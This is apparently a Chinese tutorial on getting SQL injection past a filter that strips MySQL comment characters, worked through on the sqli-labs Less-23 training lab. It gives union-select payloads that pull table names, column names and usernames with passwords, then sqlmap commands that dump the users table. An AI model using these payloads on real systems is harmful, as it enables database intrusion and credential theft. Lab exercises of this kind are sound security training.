MySQL注入 绕过去除注释符

1.MySQL中的注释符

注释符的作用:用于标记某段代码的作用,起到对代码功能的说明作用,但是注释掉的内容不会被执行。

MySQL中的注释符:
1.单行注释:--+或--空格或#
2.对行注释:/*多行注释内容*/

对于正常的SQL语句中,注释符起到说明作用的功能。但是对于在利用SQL注入漏洞过程中,注释符起到闭合单引号、多引号、双引号、单括号、多括号的功能。

2.去除注释符的代码分析

preg_replace(mixed $pattern,mixed $replacement,mixed $subject):执行一个正则表达式的搜索和替换。
$pattern:要搜索的模式,可以是字符串或一个字符串数组
$replacement:用于替换的字符串或字符串组。
$subject:要搜索替换的目标字符串或字符串数组

可以看出上述将#--过滤了

3.绕过去除注释符的SQL注入

sqli-lab-less23为例
1.我们可以执行?id=1

2.我们使用?id=1\进行探测

3.发现多了一个单引号,但是当我们使用--+#注释后面的单引号时,发现--+#已经失效
使用万能注入模板,进行探测

' or '1'='1


4.爆破数据库

-1' union select 1,database(),'3


5.爆破数据表

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),'1


6.爆破字段名

-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),'1


7.获取字段内容

-1' union select 1,(select group_concat(username,password) from users),'1

4.Sqlmap安全检测

1.爆破数据库

python2 sqlmap.py -u "" --dbs --batch


2.爆破数据表名

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-23/?id=1" -D security --tables


3.爆破字段名及其内容

python2 sqlmap.py -u "http://localhost/sqli-labs-master/Less-23/?id=1" -D security -T users --dump

MySQL注入 绕过去除注释符相关推荐

  1. Mysql注入绕过WAF总结

    Mysql注入绕过WAF总结 过滤等于号 select * from user where id = 2; select * from user where id like 2; select * f ...

  2. mysql注入时的注释处理

    我们在碰到字符型注入点时,要想办法把原查询SQL语句后面的单引号消掉才能让注入语句执行成功,我所知道常用的办法有以下几种(也许还有其他办法,望高手指教),假设查询字段数为两个且只用到一个字符型条件参数 ...

  3. SQL注入 Less23(过滤注释符)

    ?id=1 ?id=1' ''1'' LIMIT 0,1' 先去掉左右两边各一个单引号,相当于语文中的引用 '1'' LIMIT 0,1 很明显知道是单引号闭合 SELECT * FROM users ...

  4. mysql注入绕过单引号_SQL注入-绕过过滤规则

    过滤规则产生的原因 前两篇举例了SQL注入Get请求/SQL注入Post请求的案例,都是因为程序要接收用户输入的变量或者URL传递的参数,并且参数或变量会被组成 SQL语句的一部分被执行.这些数据我们 ...

  5. mysql font zhushi_关于在mysql front中使用注释符报错的问题

    问题: 前几天我在合并一些sql文件的时候发现一个问题,或许说是一个BUG,因为网上并没有相应的解决方案,自己也试了很多次也没有找到解决的方法. 在sql语句中支持"--", &q ...

  6. mysql 注入 绕过防火墙_绕过阿里云防火墙继续扫描探测和SQL注入

    前言 如今的互联网,WAF泛滥的年代,实在让我等脚本小子苦恼ing,尤其是阿里云服务器的自带防护,那不是一般的叫人牙疼,十个站8个站都是阿里云.... 最近遇到几个站都是阿里云的服务器,比如:泛微e- ...

  7. mysql 16进制 绕过_注入绕过技巧

    1.绕过空格(注释符/* */,%a0): 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20%09%0a %0b %0c %0d %a0/**/ 最基本的绕过方法,用注释替换空格: /* ...

  8. 黑客常用SQL注入绕过技术总结!

    今天给大家再次分享一篇硬核内容,那就是黑客常用的SQL注入绕过技术,还是那句话:我们学渗透技术不是为了攻击别人的系统,而是了解黑客常用的渗透技能,以此来修复我们自己系统中的漏洞,使我们的系统更加健壮, ...

  9. 黑客常用SQL注入绕过技术总结!(冰河吐血整理,建议收藏)

    大家好,我是冰河~~ 今天给大家再次分享一篇硬核内容,那就是黑客常用的SQL注入绕过技术,还是那句话:我们学渗透技术不是为了攻击别人的系统,而是了解黑客常用的渗透技能,以此来修复我们自己系统中的漏洞, ...

最新文章

  1. Binary XML file line #98: Attempt to invoke virtual method 'boolean java.lang.String.equals(java.lan
  2. it is likely that the remote side declared peer gone on this jvm
  3. nurbs非均匀有理B样条实现船体重建
  4. QT中在终端下写个小例子
  5. P3112-[USACO14DEC]后卫马克Guard Mark【贪心】
  6. java bean参数清空_Java互联网架构-Spring IOC底层源码分析
  7. 二进制,十进制的相互转换方法
  8. 牛x!一款比传统数据库快 100-1000 倍的数据库,来认识一下?
  9. python必背入门代码-Python零基础入门学习笔记(一)
  10. 搭建Windows SVN服务器及TortoiseSVN使用帮助和下载
  11. java编程练习题:统计字符出现的次数
  12. 解决Vivado仿真卡在executing simulate step
  13. 美国国家安全局硬盘固件入侵技术揭秘
  14. webqq协议分析之~~~~登陆
  15. Android获取经纬度以及地址信息
  16. 魔兽世界怀旧服哪个服务器人最多,魔兽世界怀旧服8个服务器人口普查 部落/联盟阵营最新比例...
  17. compare比对工具
  18. 基于单片机的TLC稳压电源系统设计-基于单片机大脑运算能力智力测试仪-基于单片机超声波测距系统仿真设计(报告 PCB 原理图)-基于单片机超高精度电参数测试设计-基于单片机变电站变压器运行参数监测仿真
  19. 六旋翼无人机动力学建模与仿真搭建
  20. 如何在centos环境下运行.exe文件

热门文章

  1. FastDFS 分布式文件系统介绍及安装部署
  2. openCV中图像滤波之低通滤波
  3. windows删除文件夹命令 rd | rmdir
  4. 完美解决anaconda环境中安装cartographer的各种问题
  5. 弹球游戏java怎么设置分数_Java弹球游戏的基本实现(一)
  6. html中的无限循环语句,以下不构成无限循环的语句组是(?????? )。
  7. mysql percona 集群_MySQL高可用性解决方案—Percona XtraDB Cluster
  8. 数字签名验签 — ECC算法
  9. apply()、map()、applymap()
  10. 地瓜和番薯有什么区别